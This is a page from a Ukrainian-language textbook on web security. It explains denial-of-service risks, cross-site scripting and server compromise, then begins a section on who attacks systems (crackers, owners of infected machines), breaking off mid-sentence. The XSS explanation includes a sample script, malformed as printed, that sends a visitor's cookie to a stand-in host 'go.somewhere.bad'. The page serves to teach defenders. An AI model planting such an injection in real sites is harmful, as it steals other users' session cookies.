Page 88 - 4636
P. 88

атаки  на  працездатність  програми.  Якщо  ваші  сервери  будуть  виведені  з  ладу  на  кілька  годин  або
        навіть  більше,  то  відновитися  з  такої  ситуації  буде  непросто.  Згадайте  про  постійну  доступність  в
        Інтернеті  багатьох  відомих  сайтів,  і  що  їх  можна  коли  завгодно  знайти  на  місці:  будь-який  період
        непрацездатності представляє для них проблему.  Як  і  було раніше, DoS-атаки можуть відбутися не
        тільки за людського фактору. Припустимо, що будівля з нашими серверами раптом згоріла, знесено
        селевим  потоком  або  зруйновано  інопланетними  загарбниками.  Якщо  навіть  у  нас  зберігаються  на
        стороні  надійні  резервні  копії,  але  немає  плану  швидкого  відновлення  роботи  цих  комп'ютерів  у
        мережі, то наші клієнти можуть бути втрачені на кілька днів.
              Впровадження  шкідливого  коду.  Один  з  найбільш  ефективних  видів  Інтернет-атаки  ми
        називаємо  впровадженням  шкідливого  коду.  Найбільш  відомим  його  різновидом  є  міжсайтове
        виконання сценаріїв (Cross Site Scripting, скорочується як XSS, щоб не плутати з CSS - каскадними
        таблицями  стилів).  Такі  атаки  особливо  небезпечні  тим,  що  при  цьому  не  відбувається  негайного
        псування або зникнення даних: замість цього виконується якийсь код, який призводить до подальшого
        зникнення  інформації  або  перенаправлення  користувачів,  що  може  виявитися  далеко  не  відразу.
        Міжсайтове виконання сценаріїв зазвичай працює так, як описано нижче.
              1.  Зловмисник  заповнює  якусь  форму,  дані  з  якої  будуть  відображатися  іншим  користувачам
        (наприклад, вводить коментар до якоїсь статті або повідомлення на електронну дошку оголошень. Але
        при цьому він вводить текст, який містить не тільки повідомлення, але і якийсь сценарій, який може
        виконуватися на клієнтській машині, наприклад:
                 <script>=”text/javascript"> this.document =
           "go.somewhere.bad?cookie=" + this.cookie;</script>="text/javascript">
              2.  Потім зловмисник відправляє дані форми і чекає.
              3.  Інший  користувач  системи  відкриває  сторінку  з  шкідливим  кодом  для  перегляду,  і  його
        комп'ютер виконує введений сценарій. У нашому простому прикладі користувач буде перенаправлено
        з вихідного сайту на іншу адресу, та ще з cookie-даними.
              Компрометація сервера. Компрометація сервера призводить до ефектів, які вже описані вище,
        але  її  все-таки  слід  згадати  окремо,  оскільки  іноді  зловмисники  хочуть  отримати  доступ  до  вашої
        системи - зазвичай як адміністратор (адміністратор у Windows - системах або root в Umix-системах).
        Після  цього  вони  отримують  скомпрометований  комп'ютер  у  своє  повне  розпорядження  і  можуть
        виконати на ньому будь-яку потрібну програму, зупинити комп'ютер або встановити дуже неприємне
        ПЗ.  Слід  особливо  уважно  стежити  за  такими  атаками,  оскільки  після  компрометації  сервера
        зломщики, швидше за все, постараються замести всі сліди їх присутності в системі.

              4.2  Джерела атак

              Інтуїтивно  хочеться  віднести  всіх,  хто  є  причиною  проблем  безпеки,  до  поганих  людей  або
        зловмисників,  які  прагнуть  завдати  шкоди.  Однак  на  цій  сцені  часто  фігурують  і  інші  актори,  які
        можуть діяти неусвідомлено і не вважати себе в чомусь винними.
              Зломщики. Найбільш очевидна і відома група - це зломщики (cracker). Ми не будемо називати їх
        хакерами  (hacker),  оскільки  це  не  подобається  справжнім  хакерам,  більшість  яких  є  чесними
        програмістами з цілком пристойними намірами. Зломщики ж намагаються, як би вони це мотивували,
        знайти  слабкі  місця  в  системі  і  використовувати  їх  для  досягнення  своїх  цілей.  Їх  може  вести
        жадібність, якщо вони намагаються дізнатися фінансову  інформацію  або номери кредитних  карток;
        гроші,  якщо  за  інформацію  з  ваших  систем  готова  заплатити  конкуруюча  фірма;  або  вони  просто
        талановиті особистості, яким цікаво зламати ще одну систему. Це серйозна небезпека для нас, але було
        б помилкою думати тільки про них.
              Нічого  не  підозрюючі  користувачі  заражених  машин.  Крім  зломщиків  слід  враховувати  і
        велику  кількість  інших  людей.  За  наявності  безлічі  вразливостей  і  проломів  у  безпеці  в  різних
        частинах  сучасного ПЗ значний відсоток комп'ютерів заражені програмами, які використовують всі ці
                                                            85
   83   84   85   86   87   88   89   90   91   92   93